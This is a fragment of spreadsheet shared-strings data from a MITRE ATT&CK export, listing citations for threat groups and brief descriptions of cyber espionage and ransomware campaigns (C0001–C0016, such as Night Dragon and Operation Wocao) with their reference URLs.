    <t>(Citation: Cybereason PowerLess February 2022),(Citation: Secureworks Cobalt Gypsy Feb 2017),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: Check Point APT35 CharmPower January 2022),(Citation: FireEye APT35 2018),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Cybereason PowerLess February 2022),(Citation: Microsoft Phosphorus Mar 2019),(Citation: Proofpoint TA453 March 2021),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Secureworks Cobalt Gypsy Feb 2017),(Citation: Proofpoint TA453 July2021),(Citation: Check Point Rocket Kitten),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Certfa Charming Kitten January 2021),(Citation: IBM ITG18 2020),(Citation: FireEye APT35 2018),(Citation: SecureWorks Mia Ash July 2017),</t>
  </si>
  <si>
    <t>(Citation: Haq 2014),(Citation: Haq 2014),</t>
  </si>
  <si>
    <t>,(Citation: FOX-IT May 2016 Mofang),</t>
  </si>
  <si>
    <t>(Citation: Unit42 Molerat Mar 2020),(Citation: DustySky2),(Citation: DustySky),(Citation: FireEye Operation Molerats),(Citation: Cybereason Molerats Dec 2020),(Citation: Kaspersky MoleRATs April 2019),(Citation: Unit42 Molerat Mar 2020),(Citation: DustySky),(Citation: FireEye Operation Molerats),(Citation: Cybereason Molerats Dec 2020),(Citation: Kaspersky MoleRATs April 2019),</t>
  </si>
  <si>
    <t>(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Checkpoint MosesStaff Nov 2021),</t>
  </si>
  <si>
    <t>(Citation: ClearSky MuddyWater Nov 2018),(Citation: Symantec MuddyWater Dec 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Anomali Static Kitten February 2021),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: FireEye MuddyWater Mar 2018),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Trend Micro Muddy Water March 2021),(Citation: ClearSky MuddyWater June 2019),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Symantec MuddyWater Dec 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Talos MuddyWater May 2019),(Citation: GitHub Invoke-Obfuscation),(Citation: Anomali Static Kitten February 2021),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: FireEye MuddyWater Mar 2018),(Citation: MuddyWater TrendMicro June 2018),(Citation: Talos MuddyWater Jan 2022),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Trend Micro Muddy Water March 2021),(Citation: ClearSky MuddyWater June 2019),(Citation: Securelist MuddyWater Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Recorded Future REDDELTA July 2020),(Citation: Avira Mustang Panda January 2020),(Citation: McAfee Dianxun March 2021),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Recorded Future REDDELTA July 2020),(Citation: Avira Mustang Panda January 2020),(Citation: McAfee Dianxun March 2021),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: Proofpoint TA416 November 2020),</t>
  </si>
  <si>
    <t>(Citation: Microsoft SIR Vol 21),(Citation: Microsoft NEODYMIUM Dec 2016),,</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015),(Citation: CameraShy),(Citation: CheckPoint Naikon May 2020),(Citation: Bitdefender Naikon April 2021),(Citation: Baumgartner Naikon 2015),(Citation: CheckPoint Naikon May 2020),(Citation: Bitdefender Naikon April 2021),</t>
  </si>
  <si>
    <t>(Citation: Securelist Octopus Oct 2018),(Citation: ESET Nomadic Octopus 2018),(Citation: Security Affairs DustSquad Oct 2018),(Citation: Securelist Octopus Oct 2018),(Citation: ESET Nomadic Octopus 2018),(Citation: Security Affairs DustSquad Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: FireEye APT34 Dec 2017),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Unit 42 RGDoor Jan 2018),(Citation: OilRig New Delivery Oct 2017),(Citation: Check Point APT34 April 2021),(Citation: Palo Alto OilRig Oct 2016),(Citation: Palo Alto OilRig May 2016),(Citation: Unit42 RDAT July 2020),(Citation: Unit 42 Playbook Dec 2017),(Citation: FireEye APT35 2018),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Palo Alto OilRig Sep 2018),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: Palo Alto OilRig April 2017),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: FireEye Targeted Attacks Middle East Banks),(Citation: OilRig New Delivery Oct 2017),(Citation: Check Point APT34 April 2021),(Citation: OilRig ISMAgent July 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FireEye APT34 July 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Palo Alto OilRig Oct 2016),(Citation: Unit 42 Playbook Dec 2017),(Citation: FireEye APT35 2018),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Unit42 OilRig Nov 2018),(Citation: FireEye Outlook Dec 2019),</t>
  </si>
  <si>
    <t>(Citation: Symantec Orangeworm April 2018),(Citation: Symantec Orangeworm April 2018),(Citation: Symantec Orangeworm IOCs April 2018),</t>
  </si>
  <si>
    <t>(Citation: Microsoft PLATINUM April 2016),(Citation: Microsoft PLATINUM April 2016),(Citation: Microsoft PLATINUM June 2017),(Citation: Twitter ItsReallyNick Platinum Masquerade),</t>
  </si>
  <si>
    <t>(Citation: Microsoft POLONIUM June 2022),(Citation: Microsoft POLONIUM June 2022),</t>
  </si>
  <si>
    <t>(Citation: Talos Promethium June 2020),(Citation: Microsoft SIR Vol 21),(Citation: Bitdefender StrongPity June 2020),(Citation: Microsoft NEODYMIUM Dec 2016),(Citation: Talos Promethium June 2020),(Citation: Bitdefender StrongPity June 2020),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 BackConfig May 2020),(Citation: Forcepoint Monsoon),(Citation: Volexity Patchwork June 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cymmetria Patchwork),(Citation: Unit 42 BackConfig May 2020),(Citation: Securelist Dropping Elephant),(Citation: Volexity Patchwork June 2018),(Citation: Symantec Patchwork),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cymmetria Patchwork),(Citation: PaloAlto Patchwork Mar 2018),</t>
  </si>
  <si>
    <t>(Citation: Bizeul 2014),(Citation: Villeneuve 2014),(Citation: Bizeul 2014),</t>
  </si>
  <si>
    <t>,(Citation: Kaspersky Poseidon Group),</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Putter Panda),(Citation: CrowdStrike Putter Panda),</t>
  </si>
  <si>
    <t>(Citation: ESET RTM Feb 2017),(Citation: Group IB RTM August 2019),(Citation: ESET RTM Feb 2017),(Citation: ESET Buhtrap and Buran April 2019),</t>
  </si>
  <si>
    <t>(Citation: Rancor Unit42 June 2018),(Citation: Rancor Unit42 June 2018),</t>
  </si>
  <si>
    <t>,(Citation: Talos Rocke August 2018),(Citation: Unit 42 Rocke January 2019),(Citation: Anomali Rocke March 2019),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Dragos Crashoverride 2017),(Citation: ANSSI Sandworm January 2021),(Citation: UK NCSC Olympic Attacks October 2020),(Citation: Dragos Crashoverride 2018),(Citation: ESET Industroyer),(Citation: F-Secure BlackEnergy 2014),(Citation: Secureworks IRON VIKING),(Citation: iSIGHT Sandworm 2014),(Citation: NCSC CISA Cyclops Blink Advisory February 2022),(Citation: Secureworks IRON VIKING ),(Citation: NCSC Sandworm Feb 2020),(Citation: ESET TeleBots Oct 2018),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: CrowdStrike GTR 2019),(Citation: ESET Telebots June 2017),(Citation: iSight Sandworm Oct 2014),(Citation: NCSC Cyclops Blink February 2022),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: TrendMicro Sandworm October 2014),(Citation: ANSSI Sandworm January 2021),(Citation: McAfee Sandworm November 2013),(Citation: ESET Telebots Dec 2016),(Citation: Dragos Crashoverride 2018),(Citation: UK NCSC Olympic Attacks October 2020),(Citation: ESET BlackEnergy Jan 2016),(Citation: US-CERT Ukraine Feb 2016),(Citation: ESET Telebots July 2017),(Citation: Secureworks NotPetya June 2017),</t>
  </si>
  <si>
    <t>(Citation: Scarlet Mimic Jan 2016),(Citation: Scarlet Mimic Jan 2016),</t>
  </si>
  <si>
    <t>,(Citation: MalwareBytes SideCopy Dec 2021),</t>
  </si>
  <si>
    <t>(Citation: ATT Sidewinder January 2021),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: Rewterz Sidewinder APT April 2020),(Citation: ATT Sidewinder January 2021),(Citation: Cyble Sidewinder September 2020),</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Sept 2018),(Citation: Group IB Silence Aug 2019),(Citation: SecureList Silence Nov 2017),(Citation: Group IB Silence Sept 2018),(Citation: Group IB Silence Aug 2019),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: SecureList Silence Nov 2017),</t>
  </si>
  <si>
    <t>,(Citation: Phish Labs Silent Librarian),(Citation: Proofpoint TA407 September 2019),(Citation: DOJ Iran Indictments March 2018),(Citation: Secureworks COBALT DICKENS September 2019),(Citation: Secureworks COBALT DICKENS August 2018),(Citation: Malwarebytes Silent Librarian October 2020),</t>
  </si>
  <si>
    <t>(Citation: Unit42 SilverTerrier 2018),(Citation: Unit42 SilverTerrier 2018),</t>
  </si>
  <si>
    <t>(Citation: Symantec Sowbug Nov 2017),(Citation: Symantec Sowbug Nov 2017),</t>
  </si>
  <si>
    <t>,(Citation: Citizen Lab Stealth Falcon May 2016),</t>
  </si>
  <si>
    <t>(Citation: Symantec Strider Blog),(Citation: Kaspersky ProjectSauron Blog),(Citation: Kaspersky ProjectSauron Full Report),(Citation: Kaspersky ProjectSauron Blog),</t>
  </si>
  <si>
    <t>(Citation: Symantec Suckfly May 2016),(Citation: Symantec Suckfly March 2016),(Citation: Symantec Suckfly May 2016),(Citation: Symantec Suckfly March 2016),</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA459 April 2017),(Citation: Proofpoint TA459 April 2017),</t>
  </si>
  <si>
    <t>(Citation: Unit42 Clop April 2021),(Citation: Proofpoint TA505 June 2018),(Citation: IBM TA505 April 2020),(Citation: Cybereason TA505 April 2019),(Citation: Proofpoint TA505 October 2019),(Citation: Proofpoint TA505 Mar 2018),(Citation: Proofpoint TA505 Sep 2017),(Citation: BlackBerry Amadey 2020),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Korean FSI TA505 2020),(Citation: Trend Micro TA505 June 2019),(Citation: Proofpoint TA505 Jan 2019),(Citation: NCC Group TA505),(Citation: Cybereason Clop Dec 2020),(Citation: IBM TA505 April 2020),(Citation: Cybereason TA505 April 2019),(Citation: Proofpoint TA505 October 2019),(Citation: Proofpoint TA505 Mar 2018),(Citation: Proofpoint TA505 Sep 2017),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Trend Micro TA505 June 2019),(Citation: Korean FSI TA505 2020),(Citation: TrendMicro TA505 Aug 2019),(Citation: ProofPoint SettingContent-ms July 2018),(Citation: Proofpoint TA505 Jan 2019),(Citation: NCC Group TA505),(Citation: Proofpoint TA505 June 2018),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 TA551 Jan 2021),(Citation: Unit 42 Valak July 2020),(Citation: Secureworks GOLD CABIN),(Citation: ATT QakBot April 2021),(Citation: Cybereason Valak May 2020),(Citation: Unit 42 TA551 Jan 2021),(Citation: Unit 42 Valak July 2020),(Citation: Secureworks GOLD CABIN),</t>
  </si>
  <si>
    <t>(Citation: Dragos Xenotime 2018),(Citation: FireEye TRITON 2019),(Citation: FireEye TEMP.Veles 2018),(Citation: FireEye TRITON 2019),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Hildegard Malware),(Citation: TeamTNT Cloud Enumeration),(Citation: Palo Alto Black-T October 2020),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Intezer TeamTNT September 2020),(Citation: Aqua TeamTNT August 2020),(Citation: Lacework TeamTNT May 2021),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: Palo Alto Black-T October 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Cisco Talos Intelligence Group),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: Cylance Shaheen Nov 2018),(Citation: Cylance Shaheen Nov 2018),</t>
  </si>
  <si>
    <t>(Citation: Dell TG-1314),(Citation: Dell TG-1314),</t>
  </si>
  <si>
    <t>(Citation: Talent-Jump Clambling February 2020),(Citation: Unit42 Emissary Panda May 2019),(Citation: Hacker News LuckyMouse June 2018),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Securelist LuckyMouse June 2018),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Secureworks BRONZEUNION Feb 2019),(Citation: Dell TG-3390),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Profero APT27 December 2020),(Citation: Unit42 Emissary Panda May 2019),(Citation: Hacker News LuckyMouse June 2018),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Gallagher 2015),(Citation: Securelist LuckyMouse June 2018),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Dell TG-3390),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Profero APT27 December 2020),</t>
  </si>
  <si>
    <t>(Citation: Symantec Thrip June 2018),(Citation: Symantec Thrip June 2018),</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tonto Team October 2020),(Citation: Talos Bisonal Mar 2020),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Secureworks BRONZE HUNTLEY ),(Citation: ESET Exchange Mar 2021),(Citation: TrendMicro Tonto Team October 2020),(Citation: Talos Bisonal Mar 2020),(Citation: Talos Bisonal 10 Years March 2020),(Citation: Kaspersky CactusPete Aug 2020),</t>
  </si>
  <si>
    <t>(Citation: Talos Oblique RAT March 2021),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Unit 42 ProjectM March 2016),(Citation: Unit 42 ProjectM March 2016),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Talos Oblique RAT March 2021),(Citation: Talos Transparent Tribe May 2021),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>(Citation: CitizenLab Tropic Trooper Aug 2018),(Citation: Recorded Future RedEcho Feb 2021),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: TrendMicro TropicTrooper 2015),(Citation: CitizenLab Tropic Trooper Aug 2018),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Anomali Pirate Panda April 2020),(Citation: PWC KeyBoys Feb 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: TrendMicro TropicTrooper 2015),</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019),(Citation: Accenture HyperStack October 2020),(Citation: Secureworks IRON HUNTER Profile),(Citation: ESET Carbon Mar 2017),(Citation: ESET Turla Mosquito Jan 2018),(Citation: ESET Gazer Aug 2017),(Citation: ESET Turla Mosquito May 2018),(Citation: ESET Turla PowerShell May 2019),(Citation: Symantec Waterbug Jun 2019),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: Leonardo Turla Penquin May 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Kaspersky Turla),(Citation: Symantec Waterbug),(Citation: ESET Turla August 2018),(Citation: Talos TinyTurla September 2021),(Citation: ESET Crutch December 2020),(Citation: Accenture HyperStack October 2020),(Citation: NSA NCSC Turla OilRig),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Secureworks IRON HUNTER Profile),(Citation: Github Rapid7 Meterpreter Elevate),(Citation: ESET Gazer Aug 2017),(Citation: ESET Turla Mosquito May 2018),(Citation: ESET Turla PowerShell May 2019),(Citation: Symantec Waterbug Jun 2019),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Recorded Future Turla Infra 2020),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: GitHub Turla Driver Loader),(Citation: Kaspersky Turla),(Citation: ESET ComRAT May 2020),(Citation: Unit42 AcidBox June 2020),(Citation: Talos TinyTurla September 2021),(Citation: ESET Crutch December 2020),</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ClearSky Lebanese Cedar Jan 2021),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky WIRTE November 2021),(Citation: Lab52 WIRTE Apr 2019),(Citation: Kaspersky WIRTE November 2021),(Citation: Lab52 WIRTE Apr 2019),</t>
  </si>
  <si>
    <t>(Citation: Symantec Whitefly March 2019),(Citation: Symantec Whitefly March 2019),</t>
  </si>
  <si>
    <t>(Citation: ESET Ebury Oct 2017),(Citation: ESET Windigo Mar 2014),(Citation: ESET ForSSHe December 2018),</t>
  </si>
  <si>
    <t>(Citation: objective-see windtail1 dec 2018),(Citation: objective-see windtail2 jan 2019),(Citation: SANS Windshift August 2018),(Citation: SANS Windshift August 2018),(Citation: objective-see windtail1 dec 2018),(Citation: BlackBerry Bahamut),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Winnti April 2013),(Citation: Kaspersky Winnti June 2015),(Citation: ESET PipeMon May 2020),(Citation: Kaspersky Winnti April 2013),</t>
  </si>
  <si>
    <t>(Citation: Sophos New Ryuk Attack October 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: CrowdStrike Wizard Spider March 2019),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Malwarebytes TrickBot Sep 2019),(Citation: CrowdStrike Grim Spider May 2019),(Citation: CrowdStrike Ryuk January 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: Forbes Dyre May 2017),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: Group IB GrimAgent July 2021),(Citation: Sophos New Ryuk Attack October 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: CrowdStrike Grim Spider May 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: CrowdStrike Wizard Spider October 2020),</t>
  </si>
  <si>
    <t>,(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Google Election Threats October 2020),(Citation: Check Point APT31 February 2021),(Citation: Microsoft Targeting Elections September 2020),</t>
  </si>
  <si>
    <t>(Citation: FireEye admin@338),(Citation: FireEye admin@338),</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT10 April 2017),(Citation: DOJ APT10 Dec 2018),(Citation: Securelist APT10 March 2021),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Accenture Hogfish April 2018),(Citation: Symantec Cicada November 2020),(Citation: FireEye APT10 Sept 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: PWC Cloud Hopper April 2017),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: DOJ APT10 Dec 2018),(Citation: Securelist APT10 March 2021),(Citation: Accenture Hogfish April 2018),(Citation: FireEye APT10 April 2017),(Citation: Symantec Cicada November 2020),(Citation: Github AD-Pentest-Script),(Citation: FireEye APT10 Sept 2018),</t>
  </si>
  <si>
    <t>associated campaigns</t>
  </si>
  <si>
    <t>associated campaigns citations</t>
  </si>
  <si>
    <t>C0010</t>
  </si>
  <si>
    <t>C0011</t>
  </si>
  <si>
    <t>C0015</t>
  </si>
  <si>
    <t>C0004</t>
  </si>
  <si>
    <t>C0001</t>
  </si>
  <si>
    <t>C0007</t>
  </si>
  <si>
    <t>C0002</t>
  </si>
  <si>
    <t>C0012</t>
  </si>
  <si>
    <t>C0016</t>
  </si>
  <si>
    <t>C0006</t>
  </si>
  <si>
    <t>C0013</t>
  </si>
  <si>
    <t>C0005</t>
  </si>
  <si>
    <t>C0014</t>
  </si>
  <si>
    <t>CostaRicto</t>
  </si>
  <si>
    <t>Frankenstein</t>
  </si>
  <si>
    <t>Night Dragon</t>
  </si>
  <si>
    <t>Operation CuckooBees</t>
  </si>
  <si>
    <t>Operation Dust Storm</t>
  </si>
  <si>
    <t>Operation Honeybee</t>
  </si>
  <si>
    <t>Operation Sharpshooter</t>
  </si>
  <si>
    <t>Operation Spalax</t>
  </si>
  <si>
    <t>Operation Wocao</t>
  </si>
  <si>
    <t>[C0010](https://attack.mitre.org/campaigns/C0010) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researcher assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://attack.mitre.org/campaigns/C0010) began by at least late 2020, and was still ongoing as of mid-2022.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[C0011](https://attack.mitre.org/campaigns/C0011) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://attack.mitre.org/groups/G0134) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://attack.mitre.org/groups/G0134)'s historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) </t>
  </si>
  <si>
    <t>[C0015](https://attack.mitre.org/campaigns/C0015) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://attack.mitre.org/software/S0534), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [Conti](https://attack.mitre.org/software/S0575), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://attack.mitre.org/software/S0575) ransomware playbook based on the observed pattern of activity and operator errors.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[CostaRicto](https://attack.mitre.org/campaigns/C0004) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://attack.mitre.org/campaigns/C0004) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[Frankenstein](https://attack.mitre.org/campaigns/C0001) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://attack.mitre.org/software/S0363). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/campaigns/C0007) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://attack.mitre.org/software/S1041) backdoor and noted infrastructure overlap with the TAG-16 threat group.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)(Citation: Recorded Future Chinese Activity in Southeast Asia December 2021)</t>
  </si>
  <si>
    <t>[Night Dragon](https://attack.mitre.org/campaigns/C0002) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was conducted by actors affiliated with [Winnti Group](https://attack.mitre.org/groups/G0044), [APT41](https://attack.mitre.org/groups/G0096), and BARIUM.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm)
[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">[Operation Honeybee](https://attack.mitre.org/campaigns/C0006) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign "Honeybee" after the author name discovered in malicious Word documents.(Citation: McAfee Honeybee) </t>
  </si>
  <si>
    <t xml:space="preserve">[Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://attack.mitre.org/groups/G0032) operations, including fake job recruitment lures and shared malware code.(Citation: McAfee Sharpshooter December 2018)(Citation: Bleeping Computer Op Sharpshooter March 2019)(Citation: Threatpost New Op Sharpshooter Data March 2019)    </t>
  </si>
  <si>
    <t xml:space="preserve">[Operation Spalax](https://attack.mitre.org/campaigns/C0005) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://attack.mitre.org/campaigns/C0005) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://attack.mitre.org/groups/G0099), however identified enough differences to report this as separate, unattributed activity.(Citation: ESET Operation Spalax Jan 2021)  </t>
  </si>
  <si>
    <t>[Operation Wocao](https://attack.mitre.org/campaigns/C0014) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.(Citation: FoxIT Wocao December 2019)
Security researchers assessed the [Operation Wocao](https://attack.mitre.org/campaigns/C0014) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/campaigns/C0014</t>
  </si>
  <si>
    <t>07 September 2022</t>
  </si>
